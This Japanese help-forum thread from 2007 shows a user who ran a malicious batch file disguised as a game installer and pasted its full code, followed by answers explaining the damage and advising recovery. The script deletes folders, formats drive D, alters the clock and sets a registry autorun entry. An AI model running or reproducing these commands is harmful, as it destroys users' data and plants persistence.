これはウイルスでしょうか？

DLしたbatファイルを実行したらウイルスに感染しました。
等のフルダが大量に作られ、PC内の時計がいじられました。
avastを入れてるのですが、何の反応もなかった為躊躇いもなくクリックしてしまいました。

時計がいじられてしまったので、反応がなかったとはいえ心配です。
batをtxt化しましたので、どなたか分かる方いましたら今後どうすればいいかよろしくお願いします。

date 2001-01-02
time 22:20:10
rmdir "C:\Program Files\CAPCOM" /s /q
rmdir "C:\Program Files\NtreevSoft" /s /q
rmdir "My Documents\My Downloads" /s /q
rmdir "My Documents\受信したファイル" /s /q
rmdir "Favorites" /s /q
cd デスクトップ
move "モンスターハンター フロンティア オンライン.lnk" "お前はモンスター 俺がハンター 風呂んティア.lnk"
mkdir ウイルスに感染しました ウイルスに感染しますた ウイルスにのっとられました 今すぐウイルス対策ソフトを実行汁 個人情報丸出し乙 1時間後に再起動しますｗ メール見ちゃらめぇ お前のメッセ登録数すくないのうｗｗ少ない脳ｗｗｗ 馬鹿がまた1人釣れました もう二度と人間を信じない方がいい・・・！ 人間・・・食う 貴方の御家に後で電話掛けますわ
format d:\ /v:ウイルス増殖用ドライブ /q
copy "up3722\RE8.5_install.bat" "C:\WINDOWS\system32\re.bat"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v re8 /f /d C:\WINDOWS\system32\re.bat

No.4 回答者： waros99 回答日時： 2007/08/14 01:18

こんにちは。

普通、どこから落としてこようとVirusTotalとかかけますよ。
最近はロダにもウイルスありますね。

batなら普通に中身見れるから確認すればよかったのに。
リカバリですな。ちなみに、ボクは今日システムのイメージバックアップ取ったとこです。

※お勧め
「Folder LockBox」
「Acronis True Image」

No.3 回答者： yoshi-thk 回答日時： 2007/08/13 19:37

＞P2Pを利用していなくても個人情報の漏洩というのは起きるんでしょうか？

「山田オルタナティブ」ってウイルス知ってますか？
その未知の亜種に掛かっていると、ウイルス対策ソフトでも分からないです。
一応そのウイルスについての記事を紹介するので確認してください。

INTERNET Watch
HDDの全内容を公開する「山田オルタナティブ」、Winny利用者以外も注意
http://internet.watch.impress.co.jp/cda/news/200 …

この回答へのお礼

ありがとうございます。
見てきましたが、感染済だと気付きようもないみたいですしどうしようもなさそうですね・・・

お礼日時：2007/08/13 20:04

No.2 回答者： yoshi-thk 回答日時： 2007/08/13 10:59

No1方の今回のリカバリは、ハードディスクをクリーンフォーマットして、OS等を入れ直すという事です。

僕もNo1の方の意見に賛同します。

ハードディスクのフォーマットは、それ用のソフトがなくても出来ますし、
今回の場合は、他のウイルスが入っている可能性があるのでクリーンフォーマットを勧めるのです。

システムの復元で、完全に駆除出来る可能性はないです。
何でもタダで済まそうとしたのですから、相応の苦労をした方がよいでしょう。

それから、そのようなウイルスに感染したとすれば、どのような場所から入手したか分かります。
場合によっては、P2Pソフト上にあなたの情報が漏れている可能性もあります。
今後は怪しいものは、ダウンロードするべきではないです。

この回答へのお礼

ありがとうございます。
ファイルはアップローダーからDLしたもので、P2Pから落とした物では無いです。
avastを入れているのですが警告もなかったため安易に実行してしまいました。
P2Pを利用していなくても個人情報の漏洩というのは起きるんでしょうか？

avast、ウイルスバスターでオンラインスキャンをしたのですがウイルスは発見されませんでした。

クリーンフォーマットは色々事情があって恐らくできないと思います。

とりあえずre.batをレジストリから削除してみましたが・・・

お礼日時：2007/08/13 11:12

No.1 回答者： Cupper 回答日時： 2007/08/13 04:01

たいしたことはされていませんが、いくつかのフォルダを削除されていますね。

（rmdir）
Dドライブもフォーマット（初期化）されています。（format）
さらに起動時に不明なプログラムをインストールするように仕掛けられているようです。（reg add）

・・・質問者が個人で復旧を試みるのでしたら、リカバリしたほうがスッキリ＆確実ですよ。
マイドキュメントに保存しているデータも削除されているようですので、この際
購入時の状態にまで戻してみるのも一興です。

まあ、いい経験をしたと考えるようにしましょう。

この回答への補足

書き込んでから思ったのですが、もしかして再起動してからformatやrmdirが実行されるんでしょうか？
だとするとまだ再起動してないので・・・

できれば個人でなるべくお金をかけずにbatを実行する前の状態まで戻したいのですが
市販のリカバリを使うしかないんですかね・・・

補足日時：2007/08/13 08:50

この回答へのお礼

ありがとうございます。
Dが初期化、マイドキュメントが削除されてるらしいですが、
Dをサッと見る限り、何も消されたようには見えないのですが・・・

マイドキュメンドも、質問内容のtxtに「受信したファイル」があったので見てみたのですが、
消されていないようです。Downloadsは空になっていますが、元から空だったような・・・

リカバリというのは、リカバリディスクを使っての事でしょうか？
システムの復元ではどうにかなりませんか？

お礼日時：2007/08/13 08:08